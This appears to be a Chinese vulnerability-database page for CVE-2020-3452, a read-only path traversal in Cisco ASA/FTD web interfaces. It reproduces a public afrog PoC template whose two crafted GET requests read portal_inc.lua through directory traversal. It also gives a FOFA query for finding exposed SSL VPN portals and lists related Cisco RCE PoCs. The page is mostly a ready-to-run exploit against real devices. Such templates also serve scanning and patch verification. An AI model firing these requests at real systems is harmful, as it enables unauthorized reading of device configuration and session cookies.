CVE-2020-3452: Cisco Read-Only Path Traversal

日期: 2025-09-01 | 影响软件: Cisco | POC: 已公开

漏洞描述

防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件，无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息，cookies等。 fofa: title="SSL VPN Service"

PoC代码[已公开]

id: CVE-2020-3452

info:
    name: Cisco Read-Only Path Traversal
    author: 不动明王
    severity: high
    verified: true
    description: |
        防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。
        攻击者只能查看web目录下的文件，无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息，cookies等。
        fofa:  title="SSL VPN Service"
    reference:
        - https://zhuanlan.zhihu.com/p/163246632

rules:
    r0:
        request:
            method: GET
            path: /%2bCSCOT%2b/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
            
        expression: response.status == 200 && response.headers["content-type"].contains("application/octet-stream") && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")

    r1:
        request:
            method: GET
            path: /%2bCSCOT%2b/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
        expression: response.status == 200 && response.headers["content-type"].contains("application/octet-stream") && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")

expression: r0() || r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2020/CVE-2020-3452.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2021-1497: Cisco HyperFlex HX Data Platform - Remote Command Execution POC

CVE-2021-1498: Cisco HyperFlex HX Data Platform - Remote Command Execution POC

CVE-2021-1499: Cisco HyperFlex HX Data Platform - File Upload Vulnerability POC

CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

CVE-2020-11455: LimeSurvey 4.1.11 - Path Traversal POC